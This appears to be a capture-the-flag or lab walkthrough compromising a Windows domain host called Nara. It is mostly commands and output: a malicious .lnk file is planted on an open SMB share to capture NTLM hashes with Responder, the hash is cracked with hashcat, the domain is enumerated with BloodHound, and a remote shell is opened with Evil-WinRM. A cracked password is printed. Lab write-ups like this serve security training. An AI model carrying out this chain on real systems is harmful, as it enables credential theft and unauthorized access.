Foothold
❯ smbclient '\\192.168.209.30\nara' -U Guest%''
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Oct 24 06:35:43 2024
.. DHS 0 Thu Oct 24 06:14:06 2024
Documents D 0 Sun Jul 30 09:03:13 2023
Important.txt A 2200 Sun Jul 30 09:05:31 2023
IT D 0 Sun Jul 30 11:22:50 2023
7699711 blocks of size 4096. 3934768 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \Important.txt of size 2200 as Important.txt (12.3 KiloBytes/sec) (average 12.3 KiloBytes/sec)
smb: \> cd Documents\
smb: \Documents\> ls
. D 0 Sun Jul 30 09:03:13 2023
.. D 0 Thu Oct 24 06:35:43 2024
7699711 blocks of size 4096. 3934768 blocks available
smb: \Documents\> cd ..
smb: \> cd IT
smb: \IT\> ls
. D 0 Sun Jul 30 11:22:50 2023
.. D 0 Thu Oct 24 06:35:43 2024
7699711 blocks of size 4096. 3934768 blocks available
smb: \IT\>
We can create a malicious lnk file using the slinky netexec module to capture hashes
sudo responder -I tun0 -A❯ smbclient '\\192.168.209.30\nara' -U Guest%''
smb: \> ls
. D 0 Thu Oct 24 06:59:36 2024
.. DHS 0 Thu Oct 24 06:14:06 2024
Documents D 0 Thu Oct 24 06:56:16 2024
Important.txt A 2200 Sun Jul 30 09:05:31 2023
IT D 0 Thu Oct 24 06:56:27 2024
pwned.lnk A 113 Thu Oct 24 06:59:37 2024
7699711 blocks of size 4096. 3932839 blocks available
smb: \> get pwned.lnk
getting file \pwned.lnk of size 113 as pwned.lnk (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \> cd Documents\
smb: \Documents\> put pwned.lnk
putting file pwned.lnk as \Documents\pwned.lnk (0.9 kb/s) (average 0.9 kb/s)
smb: \Documents\>
❯ hashcat -m 5600 tracey.white.hash ~/rockyou.txt -O --show
TRACY.WHITE::NARASEC:7b050286eefef12e:77c3718b5cbdf3106510154e5f93f9b6:0101000000000000008ea3b9df25db016063cd0dd76f9e890000000002000800420043005200560001001e00570049004e002d004c00310039004e00520059003700330059003100440004003400570049004e002d004c00310039004e0052005900370033005900310044002e0042004300520056002e004c004f00430041004c000300140042004300520056002e004c004f00430041004c000500140042004300520056002e004c004f00430041004c0007000800008ea3b9df25db0106000400020000000800300030000000000000000100000000200000953c4c63af28d3147d2930040776e106de869c8162de40545116a1b1c8e594e10a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003200330039000000000000000000:zqwj041FGXTracy.White:zqwj041FGX❯ bloodhound-python -d nara-security.com -u Tracy.White -p zqwj041FGX -ns 192.168.209.30 -c all
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
INFO: Found AD domain: nara-security.com
INFO: Getting TGT for user
INFO: Connecting to LDAP server: nara.nara-security.com
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: nara.nara-security.com
INFO: Found 14 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Nara.nara-security.com
INFO: Done in 00M 08S
We can add ourselves to the remote access group
❯ evil-winrm -i 192.168.209.30 -u 'Tracy.White' -p 'zqwj041FGX'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tracy.white\Documents> whoami ; type C:\Users\tracy.white\Desktop\local.txt
narasec\tracy.white
fbf8848184079e7199ce476036c4cbe2
*Evil-WinRM* PS C:\Users\tracy.white\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::c6b7:9762:15d:868c%4
IPv4 Address. . . . . . . . . . . : 192.168.209.30
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.209.254
Last updated
